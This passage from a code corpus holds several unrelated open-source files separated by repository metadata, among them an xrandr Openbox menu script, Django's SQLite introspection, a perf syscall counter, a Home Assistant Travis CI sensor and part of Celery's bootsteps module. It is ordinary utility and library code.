        (),  # empty tuple renders as a menu separator (see "if not action" below)
('auto', '--auto'),
('off', '--off'),
('reset', ' '.join([
'--auto', '--rotate normal', '--scale 1x1', '--panning 0x0'])))
# The following string processing is far more verbose than necessary but if
# the xrandr output ever changes (or I simply got it wrong to begin with)
# this should make it easier to fix.
for i in xrandr_lines:
if ' current' in i:
# Screen 0: minimum 320 x 200, current 1700 x 1440, maximum 2048 x 2048
text = [j for j in i.split(',') if ' current' in j][0]
text = text.replace(' current ', '')
etree.SubElement(root, 'separator', label="Current: %s" % text)
elif ' connected' in i:
# VGA connected 900x1440+0+0 left (normal left inverted right x axis y axis) 408mm x 255mm
text = i.replace(' connected', '')
text = text.partition('(')[0]
text = text.strip()
try:
output, mode, extra = (lambda x: (x[0], x[1], x[2:]))(text.split(' '))
outputs[output] = True
except IndexError:
# LVDS connected (normal left inverted right x axis y axis)
# Display is connected but off. Is this the best place to check that?
output, mode, extra = text, 'off', ''
outputs[output] = False
node = etree.SubElement(root, 'menu', id=output, type='output',
label=' '.join([output, mode, ' '.join(extra)]))
modes = etree.SubElement(node, 'menu', id='%s-modes' % output,
type='modes', label='modes')
etree.SubElement(node, 'separator')
# Add a position menu, but fill in later
position = etree.SubElement(node, 'menu', id='%s-position' % output,
type='position', label='position')
etree.SubElement(node, 'separator')
# Grab all the available modes (I'm ignoring refresh rates for now)
for j in xrandr_lines[xrandr_lines.index(i) + 1:]:
if not j.startswith(' '):
break
# 1440x900 59.9*+ 59.9*
text = j.strip()
text = text.split(' ')[0]
modes.append(mk_exe_node(output, text, '--mode %s' % text))
for action in actions:
if not action:
etree.SubElement(node, 'separator')
else:
node.append(mk_exe_node(output, *action))
elif ' disconnected' in i:
# TV disconnected (normal left inverted right x axis y axis)
text = i.replace(' disconnected', '')
text = text.partition('(')[0]
name, extra = (lambda x: (x[0], x[1:]))(text.split(' '))
etree.SubElement(root, 'item', label=name)
# Grab the user's rc menu shortcuts
etree.SubElement(root, 'separator', label='Shortcuts')
auto = etree.SubElement(root, 'item', label='auto')
auto_action = etree.SubElement(auto, 'action', name='execute')
etree.SubElement(auto_action, 'command').text = 'xrandr --auto'
# Populate position menus
for output in outputs.keys():
# Find position entry
position = root.find(".//menu[@id=\"%s-position\"]" % output)
# Add position options
position.append(mk_position_controls(output, 'left of', '--left-of', outputs))
position.append(mk_position_controls(output, 'right of', '--right-of', outputs))
position.append(mk_position_controls(output, 'above', '--above', outputs))
position.append(mk_position_controls(output, 'below', '--below', outputs))
position.append(mk_position_controls(output, 'same as', '--same-as', outputs))
for i in get_rc_menu():
root.append(i)
return root
if __name__ == '__main__':
ob_menu = get_xml()
sys.stdout.write(etree.tostring(ob_menu) + '\n')
|
bsd-3-clause
|
shahar-stratoscale/nova
|
nova/cells/driver.py
|
126
|
1393
|
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base Cells Communication Driver
"""
class BaseCellsDriver(object):
"""The base class for cells communication.
One instance of this class will be created for every neighbor cell
that we find in the DB and it will be associated with the cell in
its CellState.
One instance is also created by the cells manager for setting up
the consumers.
"""
def start_servers(self, msg_runner):
"""Start any messaging servers the driver may need."""
raise NotImplementedError()
def stop_servers(self):
"""Stop accepting messages."""
raise NotImplementedError()
def send_message_to_cell(self, cell_state, message):
"""Send a message to a cell."""
raise NotImplementedError()
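# Illustrative sketch (hypothetical, not part of nova): the smallest possible
# concrete driver overrides all three hooks, e.g.:
#
#   class NoopCellsDriver(BaseCellsDriver):
#       def start_servers(self, msg_runner):
#           pass
#       def stop_servers(self):
#           pass
#       def send_message_to_cell(self, cell_state, message):
#           pass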
|
apache-2.0
|
jomyhuang/sdwle
|
SDWLE/ui/game_console.py
|
1
|
9331
|
from SDWLE.constants import CHARACTER_CLASS
card_abbreviations = {
'Mark of the Wild': 'Mrk Wild',
'Power of the Wild': 'Pow Wild',
'Wild Growth': 'Wld Grth',
'Healing Touch': 'Hlng Tch',
'Mark of Nature': 'Mrk Ntr',
'Savage Roar': 'Svg Roar',
'Soul of the Forest': 'Sol Frst',
'Force of Nature': 'Frce Nat',
'Keeper of the Grove': 'Kpr Grve',
'Druid of the Claw': 'Drd Claw',
'Stonetusk Boar': 'Stntsk Br',
'Raging Worgen': 'Rgng Wrgn',
}
def abbreviate(card_name):
return card_abbreviations.get(card_name, card_name)
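# Illustrative examples:
#   abbreviate('Wild Growth')  -> 'Wld Grth'
#   abbreviate('Unknown Card') -> 'Unknown Card'  (unmapped names pass through)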
def game_to_string(game):
pass
class console:
    @classmethod
    def log(cls, message, source=None, color=0):
        print(message)
class ConsoleGameRender:
def __init__(self, window, game, viewing_player):
if viewing_player is game.players[0]:
self.top_player = game.players[1]
self.bottom_player = game.players[0]
else:
self.top_player = game.players[0]
self.bottom_player = game.players[1]
# curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
# curses.init_pair(2, curses.COLOR_GREEN, curses.COLOR_WHITE)
# curses.init_pair(3, curses.COLOR_WHITE, curses.COLOR_BLUE)
# curses.init_pair(4, curses.COLOR_BLACK, curses.COLOR_YELLOW)
# self.top_minion_window = window.derwin(3, 80, 4, 0)
# self.bottom_minion_window = window.derwin(3, 80, 8, 0)
# self.card_window = window.derwin(5, 80, 16, 0)
self.top_minion_window = None
self.bottom_minion_window = None
self.card_window = None
self.window = window
self.game = game
self.targets = None
self.selected_target = None
self.selection_index = -1
self.lines = []
def console_printline(self):
for line in self.lines:
console.log(line)
def draw_minion(self, minion, window, y, x, main=True):
status_array = []
color = 0
if minion.can_attack():
status_array.append("*")
if not self.targets:
color = 2
else:
if not self.targets:
color = 1
if "attack" in minion.events:
status_array.append("a")
if "turn_start" in minion.events:
status_array.append("b")
if minion.charge:
status_array.append("c")
if minion.deathrattle is not None:
status_array.append("d")
if minion.enraged:
status_array.append("e")
if minion.frozen:
status_array.append("f")
if minion.immune:
status_array.append("i")
if minion.stealth:
status_array.append("s")
if minion.taunt:
status_array.append("t")
if minion.exhausted and not minion.charge:
status_array.append("z")
# if self.targets:
# if minion is self.selected_target:
# color = curses.color_pair(4)
# elif minion in self.targets:
# color = curses.color_pair(3)
name = abbreviate(minion.card.name)[:10]
status = ''.join(status_array)
power_line = "({0}) ({1})".format(minion.calculate_attack(), minion.health)
facedown = ''
if minion.card.is_facedown():
status = name
name = 'facedown'
#console(y, x, "{0}{1}:{2} {3:^9} {4:^9} {5:^9}".format(spaces, minion.index, facedown, name, power_line, status), color)
#console(y+1, x,"{0:^9}".format(power_line), color)
#console(y+2, x, "{0:^9}".format(status), color)
# window.addstr(y + 2, x, "{0}".format(minion.index), color
self.lines[0] += '[{0:^10}]'.format(name)
self.lines[1] += '[{0:^10}]'.format(power_line)
self.lines[2] += '[{0:^1} {1:^8}]'.format(minion.index, status[:8])
def draw_card(self, card, player, index, window, y, x):
color = 0
if card.can_use(player, player.game):
status = "*"
if not self.targets:
color = 2
else:
status = ' '
if not self.targets:
color = 1
if self.targets:
if card is self.selected_target:
color = 4
elif card in self.targets:
color = 3
name = card.name[:15]
#console(y + 0, x, "{0}:{1:>2} mana ({2}) {3:^15} ".format(index, card.mana_cost(), status, name), color)
# console(y + 1, x, "{0:^15}".format(name), color)
self.lines[0] += '+' + '-'*10 + '+'
self.lines[1] += '|{0:^10}|'.format(name[:10])
self.lines[2] += '|{0:^10}|'.format(status[:10])
self.lines[3] += '|{0:^10}|'.format(index)
def draw_hero(self, player, window, x, y):
# color = curses.color_pair(0)
# if self.targets:
# if player.hero is self.selected_target:
# color = curses.color_pair(4)
# elif player.hero in self.targets:
# color = curses.color_pair(3)
# if player.weapon is not None:
# weapon_power = "({0}) ({1})".format(player.weapon.base_attack, player.weapon.durability)
# window.addstr(y, x, "{0:^20}".format(player.weapon.card.name))
# window.addstr(y + 1, x, "{0:^20}".format(weapon_power))
#
# hero_power = "({0}) ({1}+{4}) -- {2}/{3}".format(player.hero.calculate_attack(), player.hero.health,
# player.mana, player.max_mana, player.hero.armor)
# window.addstr(y, x + 20, "{0:^20}".format(CHARACTER_CLASS.to_str(player.hero.character_class)), color)
# window.addstr(y + 1, x + 20, "{0:^20}".format(hero_power), color)
#
# window.addstr(y, x + 40, "{0:^20}".format("Hero Power"))
# if player.hero.power.can_use():
# window.addstr(y + 1, x + 40, "{0:^20}".format("*"))
pass
def draw_game(self):
# console(0,0,'draw_game Turn:{0}'.format(self.game._turns_passed))
# self.window.clear()
# self.bottom_minion_window.clear()
# self.top_minion_window.clear()
# self.card_window.clear()
def draw_minions(minions, window, main):
self.lines = ['','','','']
l_offset = int((80 - 10 * len(minions)) / 2)
index = 0
for minion in minions:
# if main and index == self.selection_index:
# window.addstr(2, l_offset + index * 10 - 1, "^")
self.draw_minion(minion, window, 0, l_offset + index * 10, main)
index += 1
# if main and len(minions) == self.selection_index:
# window.addstr(2, l_offset + index * 10 - 1, "^")
self.console_printline()
def draw_cards(cards, player, window, y):
self.lines = ['','','','']
l_offset = int((80 - 16 * len(cards)) / 2)
index = 0
for card in cards:
self.draw_card(card, player, index, window, y, l_offset + index * 16)
index += 1
if not index % 5:
self.console_printline()
self.lines = ['','','','']
if index % 5:
self.console_printline()
        top_player_info = 'deck:{0} hand:{1} base:{2} black-hole:{3}'.format(
            self.top_player.deck.left,
            len(self.top_player.hand),
            len(self.top_player.graveyard),
            len(self.top_player.graveyard_blackhole))
console.log(top_player_info)
draw_minions(self.top_player.minions, self.top_minion_window, False)
draw_minions(self.bottom_player.minions, self.bottom_minion_window, True)
draw_cards(self.bottom_player.hand, self.bottom_player, self.card_window, 0)
        player_info = 'turn:{} player {} deck:{} base:{}, black-hole:{}'.format(
            self.game._turns_passed,
            self.bottom_player.name,
            self.bottom_player.deck.left,
            len(self.bottom_player.graveyard),
            len(self.bottom_player.graveyard_blackhole))
console.log(player_info)
# draw_cards(self.bottom_player.hand[:5], self.bottom_player, self.card_window, 0)
# draw_cards(self.bottom_player.hand[5:], self.bottom_player, self.card_window, 3)
# self.draw_hero(self.top_player, self.window, 10, 0)
# self.draw_hero(self.bottom_player, self.window, 10, 12)
# self.window.refresh()
# self.bottom_minion_window.refresh()
# self.top_minion_window.refresh()
# self.card_window.refresh()
|
mit
|
bykoianko/omim
|
search/pysearch/run_search_server.py
|
11
|
2565
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from __future__ import print_function
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import argparse
import json
import os
import pysearch
import urlparse
DIR = os.path.dirname(__file__)
RESOURCE_PATH = os.path.realpath(os.path.join(DIR, '..', '..', 'data'))
MWM_PATH = os.path.realpath(os.path.join(DIR, '..', '..', 'data'))
PORT=8080
class HTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
result = urlparse.urlparse(self.path)
query = urlparse.parse_qs(result.query)
def sparam(name):
return query[name][-1]
def fparam(name):
return float(sparam(name))
params = pysearch.Params()
try:
params.query = sparam('query')
params.locale = sparam('locale')
params.position = pysearch.Mercator(fparam('posx'), fparam('posy'))
params.viewport = pysearch.Viewport(
pysearch.Mercator(fparam('minx'), fparam('miny')),
pysearch.Mercator(fparam('maxx'), fparam('maxy')))
except KeyError:
self.send_response(400)
return
results = HTTPHandler.engine.query(params)
responses = [{'name': result.name,
'address': result.address,
'has_center': result.has_center,
'center': {'x': result.center.x,
'y': result.center.y
}
}
for result in results]
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.end_headers()
json.dump(responses, self.wfile)
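# Illustrative request (assumed parameter values; posx/posy and the viewport
# bounds are Mercator coordinates):
#   GET /?query=cafe&locale=en&posx=0&posy=0&minx=-1&miny=-1&maxx=1&maxy=1
# The handler responds with a JSON list of {name, address, has_center, center}.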
def main(args):
pysearch.init(args.r, args.m)
    HTTPHandler.engine = pysearch.SearchEngine()
    print('Starting HTTP server on port', args.p)
server = HTTPServer(('', args.p), HTTPHandler)
server.serve_forever()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-r', metavar='RESOURCE_PATH', default=RESOURCE_PATH,
help='Path to resources directory.')
parser.add_argument('-m', metavar='MWM_PATH', default=MWM_PATH,
help='Path to mwm files.')
    parser.add_argument('-p', metavar='PORT', type=int, default=PORT,
                        help='Port for the server to listen on.')
args = parser.parse_args()
main(args)
|
apache-2.0
|
piquadrat/django
|
django/db/backends/sqlite3/introspection.py
|
7
|
11272
|
import re
from django.db.backends.base.introspection import (
BaseDatabaseIntrospection, FieldInfo, TableInfo,
)
from django.db.models.indexes import Index
field_size_re = re.compile(r'^\s*(?:var)?char\s*\(\s*(\d+)\s*\)\s*$')
def get_field_size(name):
""" Extract the size number from a "varchar(11)" type name """
m = field_size_re.search(name)
return int(m.group(1)) if m else None
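# Illustrative examples:
#   get_field_size('varchar(30)') -> 30
#   get_field_size('text')        -> None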
# This light wrapper "fakes" a dictionary interface, because some SQLite data
# types include variables in them -- e.g. "varchar(30)" -- and can't be matched
# as a simple dictionary lookup.
class FlexibleFieldLookupDict:
# Maps SQL types to Django Field types. Some of the SQL types have multiple
# entries here because SQLite allows for anything and doesn't normalize the
# field type; it uses whatever was given.
base_data_types_reverse = {
'bool': 'BooleanField',
'boolean': 'BooleanField',
'smallint': 'SmallIntegerField',
'smallint unsigned': 'PositiveSmallIntegerField',
'smallinteger': 'SmallIntegerField',
'int': 'IntegerField',
'integer': 'IntegerField',
'bigint': 'BigIntegerField',
'integer unsigned': 'PositiveIntegerField',
'decimal': 'DecimalField',
'real': 'FloatField',
'text': 'TextField',
'char': 'CharField',
'blob': 'BinaryField',
'date': 'DateField',
'datetime': 'DateTimeField',
'time': 'TimeField',
}
def __getitem__(self, key):
key = key.lower()
try:
return self.base_data_types_reverse[key]
except KeyError:
size = get_field_size(key)
if size is not None:
return ('CharField', {'max_length': size})
raise KeyError
class DatabaseIntrospection(BaseDatabaseIntrospection):
data_types_reverse = FlexibleFieldLookupDict()
def get_table_list(self, cursor):
"""Return a list of table and view names in the current database."""
# Skip the sqlite_sequence system table used for autoincrement key
# generation.
cursor.execute("""
SELECT name, type FROM sqlite_master
WHERE type in ('table', 'view') AND NOT name='sqlite_sequence'
ORDER BY name""")
return [TableInfo(row[0], row[1][0]) for row in cursor.fetchall()]
def get_table_description(self, cursor, table_name):
"""
Return a description of the table with the DB-API cursor.description
interface.
"""
return [
FieldInfo(
info['name'],
info['type'],
None,
info['size'],
None,
None,
info['null_ok'],
info['default'],
) for info in self._table_info(cursor, table_name)
]
def get_sequences(self, cursor, table_name, table_fields=()):
pk_col = self.get_primary_key_column(cursor, table_name)
return [{'table': table_name, 'column': pk_col}]
def get_relations(self, cursor, table_name):
"""
Return a dictionary of {field_name: (field_name_other_table, other_table)}
representing all relationships to the given table.
"""
# Dictionary of relations to return
relations = {}
# Schema for this table
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
try:
results = cursor.fetchone()[0].strip()
except TypeError:
# It might be a view, then no results will be returned
return relations
results = results[results.index('(') + 1:results.rindex(')')]
# Walk through and look for references to other tables. SQLite doesn't
# really have enforced references, but since it echoes out the SQL used
# to create the table we can look for REFERENCES statements used there.
for field_desc in results.split(','):
field_desc = field_desc.strip()
if field_desc.startswith("UNIQUE"):
continue
m = re.search(r'references (\S*) ?\(["|]?(.*)["|]?\)', field_desc, re.I)
if not m:
continue
table, column = [s.strip('"') for s in m.groups()]
if field_desc.startswith("FOREIGN KEY"):
# Find name of the target FK field
m = re.match(r'FOREIGN KEY\s*\(([^\)]*)\).*', field_desc, re.I)
field_name = m.groups()[0].strip('"')
else:
field_name = field_desc.split()[0].strip('"')
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s", [table])
result = cursor.fetchall()[0]
other_table_results = result[0].strip()
li, ri = other_table_results.index('('), other_table_results.rindex(')')
other_table_results = other_table_results[li + 1:ri]
for other_desc in other_table_results.split(','):
other_desc = other_desc.strip()
if other_desc.startswith('UNIQUE'):
continue
other_name = other_desc.split(' ', 1)[0].strip('"')
if other_name == column:
relations[field_name] = (other_name, table)
break
return relations
def get_key_columns(self, cursor, table_name):
"""
Return a list of (column_name, referenced_table_name, referenced_column_name)
for all key columns in given table.
"""
key_columns = []
# Schema for this table
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
results = cursor.fetchone()[0].strip()
results = results[results.index('(') + 1:results.rindex(')')]
# Walk through and look for references to other tables. SQLite doesn't
# really have enforced references, but since it echoes out the SQL used
# to create the table we can look for REFERENCES statements used there.
for field_index, field_desc in enumerate(results.split(',')):
field_desc = field_desc.strip()
if field_desc.startswith("UNIQUE"):
continue
m = re.search(r'"(.*)".*references (.*) \(["|](.*)["|]\)', field_desc, re.I)
if not m:
continue
# This will append (column_name, referenced_table_name, referenced_column_name) to key_columns
key_columns.append(tuple(s.strip('"') for s in m.groups()))
return key_columns
def get_primary_key_column(self, cursor, table_name):
"""Return the column name of the primary key for the given table."""
# Don't use PRAGMA because that causes issues with some transactions
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
row = cursor.fetchone()
if row is None:
raise ValueError("Table %s does not exist" % table_name)
results = row[0].strip()
results = results[results.index('(') + 1:results.rindex(')')]
for field_desc in results.split(','):
field_desc = field_desc.strip()
m = re.search('"(.*)".*PRIMARY KEY( AUTOINCREMENT)?', field_desc)
if m:
return m.groups()[0]
return None
def _table_info(self, cursor, name):
cursor.execute('PRAGMA table_info(%s)' % self.connection.ops.quote_name(name))
# cid, name, type, notnull, default_value, pk
return [{
'name': field[1],
'type': field[2],
'size': get_field_size(field[2]),
'null_ok': not field[3],
'default': field[4],
'pk': field[5], # undocumented
} for field in cursor.fetchall()]
def get_constraints(self, cursor, table_name):
"""
Retrieve any constraints or keys (unique, pk, fk, check, index) across
one or more columns.
"""
constraints = {}
# Get the index info
cursor.execute("PRAGMA index_list(%s)" % self.connection.ops.quote_name(table_name))
for row in cursor.fetchall():
# Sqlite3 3.8.9+ has 5 columns, however older versions only give 3
# columns. Discard last 2 columns if there.
number, index, unique = row[:3]
# Get the index info for that index
cursor.execute('PRAGMA index_info(%s)' % self.connection.ops.quote_name(index))
for index_rank, column_rank, column in cursor.fetchall():
if index not in constraints:
constraints[index] = {
"columns": [],
"primary_key": False,
"unique": bool(unique),
"foreign_key": False,
"check": False,
"index": True,
}
constraints[index]['columns'].append(column)
# Add type and column orders for indexes
if constraints[index]['index'] and not constraints[index]['unique']:
# SQLite doesn't support any index type other than b-tree
constraints[index]['type'] = Index.suffix
cursor.execute(
"SELECT sql FROM sqlite_master "
"WHERE type='index' AND name=%s" % self.connection.ops.quote_name(index)
)
orders = []
# There would be only 1 row to loop over
for sql, in cursor.fetchall():
order_info = sql.split('(')[-1].split(')')[0].split(',')
orders = ['DESC' if info.endswith('DESC') else 'ASC' for info in order_info]
constraints[index]['orders'] = orders
# Get the PK
pk_column = self.get_primary_key_column(cursor, table_name)
if pk_column:
# SQLite doesn't actually give a name to the PK constraint,
# so we invent one. This is fine, as the SQLite backend never
# deletes PK constraints by name, as you can't delete constraints
# in SQLite; we remake the table with a new PK instead.
constraints["__primary__"] = {
"columns": [pk_column],
"primary_key": True,
"unique": False, # It's not actually a unique constraint.
"foreign_key": False,
"check": False,
"index": False,
}
# Get foreign keys
cursor.execute('PRAGMA foreign_key_list(%s)' % self.connection.ops.quote_name(table_name))
for row in cursor.fetchall():
# Remaining on_update/on_delete/match values are of no interest here
id_, seq, table, from_, to = row[:5]
constraints['fk_%d' % id_] = {
'columns': [from_],
'primary_key': False,
'unique': False,
'foreign_key': (table, to),
'check': False,
'index': False,
}
return constraints
|
bsd-3-clause
|
alma-siwon/Solid_Kernel-GPROJ
|
tools/perf/scripts/python/syscall-counts.py
|
11181
|
1522
|
# system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
|
gpl-2.0
|
balloob/home-assistant
|
homeassistant/components/travisci/sensor.py
|
13
|
5424
|
"""This component provides HA sensor support for Travis CI framework."""
from datetime import timedelta
import logging
from travispy import TravisPy
from travispy.errors import TravisError
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION,
CONF_API_KEY,
CONF_MONITORED_CONDITIONS,
CONF_SCAN_INTERVAL,
TIME_SECONDS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Information provided by https://travis-ci.org/"
CONF_BRANCH = "branch"
CONF_REPOSITORY = "repository"
DEFAULT_BRANCH_NAME = "master"
SCAN_INTERVAL = timedelta(seconds=30)
# sensor_type [ description, unit, icon ]
SENSOR_TYPES = {
"last_build_id": ["Last Build ID", "", "mdi:card-account-details"],
"last_build_duration": ["Last Build Duration", TIME_SECONDS, "mdi:timelapse"],
"last_build_finished_at": ["Last Build Finished At", "", "mdi:timetable"],
"last_build_started_at": ["Last Build Started At", "", "mdi:timetable"],
"last_build_state": ["Last Build State", "", "mdi:github"],
"state": ["State", "", "mdi:github"],
}
NOTIFICATION_ID = "travisci"
NOTIFICATION_TITLE = "Travis CI Sensor Setup"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_MONITORED_CONDITIONS, default=list(SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
vol.Required(CONF_BRANCH, default=DEFAULT_BRANCH_NAME): cv.string,
vol.Optional(CONF_REPOSITORY, default=[]): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_SCAN_INTERVAL, default=SCAN_INTERVAL): cv.time_period,
}
)
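# Illustrative configuration.yaml entry (keys assumed from the schema above;
# the token and repository slug are placeholders):
#
#   sensor:
#     - platform: travisci
#       api_key: YOUR_GITHUB_TOKEN
#       branch: master
#       repository:
#         - account/project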
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Travis CI sensor."""
token = config.get(CONF_API_KEY)
repositories = config.get(CONF_REPOSITORY)
branch = config.get(CONF_BRANCH)
try:
travis = TravisPy.github_auth(token)
user = travis.user()
except TravisError as ex:
_LOGGER.error("Unable to connect to Travis CI service: %s", str(ex))
hass.components.persistent_notification.create(
"Error: {}<br />"
"You will need to restart hass after fixing."
"".format(ex),
title=NOTIFICATION_TITLE,
notification_id=NOTIFICATION_ID,
)
return False
sensors = []
    # If no specific repository was selected, show all repositories
    # associated with the user
if not repositories:
all_repos = travis.repos(member=user.login)
repositories = [repo.slug for repo in all_repos]
for repo in repositories:
if "/" not in repo:
repo = f"{user.login}/{repo}"
for sensor_type in config.get(CONF_MONITORED_CONDITIONS):
sensors.append(TravisCISensor(travis, repo, user, branch, sensor_type))
add_entities(sensors, True)
return True
class TravisCISensor(Entity):
"""Representation of a Travis CI sensor."""
def __init__(self, data, repo_name, user, branch, sensor_type):
"""Initialize the sensor."""
self._build = None
self._sensor_type = sensor_type
self._data = data
self._repo_name = repo_name
self._user = user
self._branch = branch
self._state = None
self._name = "{} {}".format(self._repo_name, SENSOR_TYPES[self._sensor_type][0])
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return SENSOR_TYPES[self._sensor_type][1]
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def device_state_attributes(self):
"""Return the state attributes."""
attrs = {}
attrs[ATTR_ATTRIBUTION] = ATTRIBUTION
if self._build and self._state is not None:
if self._user and self._sensor_type == "state":
attrs["Owner Name"] = self._user.name
attrs["Owner Email"] = self._user.email
else:
attrs["Committer Name"] = self._build.commit.committer_name
attrs["Committer Email"] = self._build.commit.committer_email
attrs["Commit Branch"] = self._build.commit.branch
attrs["Committed Date"] = self._build.commit.committed_at
attrs["Commit SHA"] = self._build.commit.sha
return attrs
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return SENSOR_TYPES[self._sensor_type][2]
def update(self):
"""Get the latest data and updates the states."""
_LOGGER.debug("Updating sensor %s", self._name)
repo = self._data.repo(self._repo_name)
self._build = self._data.build(repo.last_build_id)
if self._build:
if self._sensor_type == "state":
branch_stats = self._data.branch(self._branch, self._repo_name)
self._state = branch_stats.state
else:
param = self._sensor_type.replace("last_build_", "")
self._state = getattr(self._build, param)
|
apache-2.0
|
kawamon/hue
|
desktop/core/ext-py/celery-4.2.1/celery/bootsteps.py
|
2
|
12545
|
# -*- coding: utf-8 -*-
"""A directed acyclic graph of reusable components."""
from __future__ import absolute_import, unicode_literals
from collections import deque
from threading import Event
from kombu.common import ignore_errors
from kombu.utils.encoding import bytes_to_str
from kombu.utils.imports import symbol_by_name
from .five import bytes_if_py2, values, with_metaclass
from .utils.graph import DependencyGraph, GraphFormatter
from .utils.imports import instantiate, qualname
from .utils.log import get_logger
try:
from greenlet import GreenletExit
except ImportError: # pragma: no cover
IGNORE_ERRORS = ()
else:
IGNORE_ERRORS = (GreenletExit,)
__all__ = ('Blueprint', 'Step', 'StartStopStep', 'ConsumerStep')
#: States
RUN = 0x1
CLOSE = 0x2
TERMINATE = 0x3
logger = get_logger(__name__)
def _pre(ns, fmt):
return '| {0}: {1}'.format(ns.alias, fmt)
def _label(s):
return s.name.rsplit('.', 1)[-1]
class StepFormatter(GraphFormatter):
"""Graph formatter for :class:`Blueprint`."""
blueprint_prefix = '⧉'
conditional_prefix = '∘'
blueprint_scheme = {
'shape': 'parallelogram',
'color': 'slategray4',
'fillcolor': 'slategray3',
}
def label(self, step):
return step and '{0}{1}'.format(
self._get_prefix(step),
bytes_to_str(
(step.label or _label(step)).encode('utf-8', 'ignore')),
)
def _get_prefix(self, step):
if step.last:
return self.blueprint_prefix
if step.conditional:
return self.conditional_prefix
return ''
def node(self, obj, **attrs):
scheme = self.blueprint_scheme if obj.last else self.node_scheme
return self.draw_node(obj, scheme, attrs)
def edge(self, a, b, **attrs):
if a.last:
attrs.update(arrowhead='none', color='darkseagreen3')
return self.draw_edge(a, b, self.edge_scheme, attrs)
class Blueprint(object):
"""Blueprint containing bootsteps that can be applied to objects.
Arguments:
        steps (Sequence[Union[str, Step]]): List of steps.
name (str): Set explicit name for this blueprint.
on_start (Callable): Optional callback applied after blueprint start.
on_close (Callable): Optional callback applied before blueprint close.
on_stopped (Callable): Optional callback applied after
blueprint stopped.
"""
GraphFormatter = StepFormatter
name = None
state = None
started = 0
default_steps = set()
state_to_name = {
0: 'initializing',
RUN: 'running',
CLOSE: 'closing',
TERMINATE: 'terminating',
}
def __init__(self, steps=None, name=None,
on_start=None, on_close=None, on_stopped=None):
self.name = name or self.name or qualname(type(self))
self.types = set(steps or []) | set(self.default_steps)
self.on_start = on_start
self.on_close = on_close
self.on_stopped = on_stopped
self.shutdown_complete = Event()
self.steps = {}
def start(self, parent):
self.state = RUN
if self.on_start:
self.on_start()
for i, step in enumerate(s for s in parent.steps if s is not None):
self._debug('Starting %s', step.alias)
self.started = i + 1
step.start(parent)
logger.debug('^-- substep ok')
def human_state(self):
return self.state_to_name[self.state or 0]
def info(self, parent):
info = {}
for step in parent.steps:
info.update(step.info(parent) or {})
return info
def close(self, parent):
if self.on_close:
self.on_close()
self.send_all(parent, 'close', 'closing', reverse=False)
def restart(self, parent, method='stop',
description='restarting', propagate=False):
self.send_all(parent, method, description, propagate=propagate)
def send_all(self, parent, method,
description=None, reverse=True, propagate=True, args=()):
description = description or method.replace('_', ' ')
steps = reversed(parent.steps) if reverse else parent.steps
for step in steps:
if step:
fun = getattr(step, method, None)
if fun is not None:
self._debug('%s %s...',
description.capitalize(), step.alias)
try:
fun(parent, *args)
except Exception as exc: # pylint: disable=broad-except
if propagate:
raise
logger.exception(
'Error on %s %s: %r', description, step.alias, exc)
def stop(self, parent, close=True, terminate=False):
what = 'terminating' if terminate else 'stopping'
if self.state in (CLOSE, TERMINATE):
return
if self.state != RUN or self.started != len(parent.steps):
# Not fully started, can safely exit.
self.state = TERMINATE
self.shutdown_complete.set()
return
self.close(parent)
self.state = CLOSE
self.restart(
parent, 'terminate' if terminate else 'stop',
